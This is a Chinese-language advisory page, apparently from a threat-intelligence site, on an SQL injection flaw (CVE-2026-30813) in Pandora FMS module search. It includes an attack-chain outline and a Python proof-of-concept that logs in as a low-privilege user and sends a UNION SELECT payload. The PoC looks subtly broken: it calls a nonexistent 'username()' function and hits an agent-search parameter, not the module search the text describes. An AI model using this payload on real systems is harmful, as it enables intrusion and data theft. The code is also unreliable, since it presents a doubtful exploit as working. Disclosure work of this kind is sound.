CVE-2026-30813 CVSS 8.8 高危

CVE-2026-30813 Pandora FMS SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30813

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Pandora FMS

漏洞概述

Pandora FMS 777至800版本存在SQL注入漏洞。由于模块搜索功能未能正确中和特殊元素，攻击者可利用该漏洞执行恶意SQL语句。此漏洞CVSS评分8.8，属于高危。攻击者需具备低权限，无需交互即可通过网络攻击，严重影响数据机密性、完整性及可用性。

技术细节

该漏洞源于Pandora FMS在处理“模块搜索”请求时，对用户提供的输入参数缺乏严格的过滤或转义机制，导致特殊SQL字符被直接拼接到后端数据库查询语句中。攻击者可以利用这一设计缺陷，精心构造恶意的SQL Payload。根据CVSS矢量分析，攻击者需要具备低权限用户账户（PR:L）。利用过程通常涉及发送特制的HTTP请求至模块搜索接口，注入如UNION SELECT或基于时间的盲注语句。成功利用该漏洞后，攻击者不仅可以绕过数据库访问控制，窃取敏感信息（如用户凭证、配置数据），还可能通过写入WebShell等方式进一步控制服务器，造成严重的数据泄露和系统破坏。

攻击链分析

STEP 1

步骤1

攻击者使用低权限账户登录Pandora FMS系统。

STEP 2

步骤2

识别模块搜索功能中存在SQL注入漏洞的参数。

STEP 3

步骤3

构造包含恶意SQL语句的HTTP请求发送至服务器。

STEP 4

步骤4

服务器执行恶意SQL语句，返回敏感数据或执行系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target settings
target_url = "http://target-ip/pandora_console/ajax.php"
username = "low_priv_user"
password = "password"

# Create session and login
session = requests.Session()
login_data = {
    "nick": username,
    "pass": password,
    "login_button": "Login"
}
session.post(target_url.replace("ajax.php", "index.php"), data=login_data)

# Exploit payload for module search SQL injection
# Using a basic UNION based injection example
payload = {
    "page": "operation/agentes/ver_agente",
    "search_agents": "1' UNION SELECT NULL, username(), NULL, NULL, NULL-- -"
}

# Send malicious request
response = session.get(target_url, params=payload)

if response.status_code == 200:
    print("[+] Potential SQL Injection Successful")
    print("[+] Response snippet:", response.text[:200])
else:
    print("[-] Exploit request failed")

影响范围

Pandora FMS 777 - 800

防御指南

临时缓解措施

建议在WAF中添加针对该接口的SQL注入防护规则，并暂时禁用非必要用户的模块搜索功能权限，直至完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表